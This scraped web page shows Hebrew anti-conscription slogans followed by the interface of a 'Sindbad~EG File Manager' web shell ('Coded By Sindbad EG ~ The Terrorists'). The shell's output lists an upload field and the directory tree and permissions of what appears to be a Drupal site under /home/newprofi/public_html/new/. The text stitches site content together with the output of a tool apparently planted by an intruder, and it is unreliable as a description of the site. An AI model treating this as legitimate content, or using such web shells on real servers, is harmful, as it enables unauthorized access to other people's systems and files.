מה יקרה אם
אני לא אתגייס?
מי גייס את
הגבינה שלי?
כמה חיילים צריך
כדי להחליף נורה?
של מי
הבטחון
הזה?
אל תתנו לנו רובים
גיוס לכולם—לא בבית ספרנו

uploads

D.R.S Dz

Sindbad~EG File Manager

Current Path : /home/newprofi/public_html/new/
Upload File :

Name
Size
Permissions
Options
includes
--
drwxr-xr-x
misc
--
drwxr-xr-x
modules
--
drwxr-xr-x
node
--
drwxr-xr-x
profiles
--
drwxr-xr-x
scripts
--
drwxr-xr-x
sites
--
drwxr-xr-x
themes
--
drwxr-xr-x
.ftpquota
0.015 KB
-rw-------
.gitignore
0.17 KB
-rw-r--r--
.htaccess
5.231 KB
-rw-r--r--
CHANGELOG.txt
108.185 KB
-rw-r--r--
COPYRIGHT.txt
1.446 KB
-rw-r--r--
Gass.jpg
1.567 KB
-rw-r--r--
INSTALL.mysql.txt
1.677 KB
-rw-r--r--
INSTALL.pgsql.txt
1.83 KB
-rw-r--r--
INSTALL.sqlite.txt
1.268 KB
-rw-r--r--
INSTALL.txt
17.573 KB
-rw-r--r--
LICENSE.txt
17.668 KB
-rw-r--r--
MAINTAINERS.txt
8.506 KB
-rw-r--r--
README.txt
5.256 KB
-rw-r--r--
UPGRADE.txt
9.886 KB
-rw-r--r--
error_log
35.105 KB
-rw-r--r--
index.php
0.518 KB
-rw-r--r--
install.php
0.687 KB
-rw-r--r--
robots.txt
2.138 KB
-rw-r--r--
update.php
19.518 KB
-rw-r--r--
web.config
2.148 KB
-rw-r--r--
xmlrpc.php
0.407 KB
-rw-r--r--

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists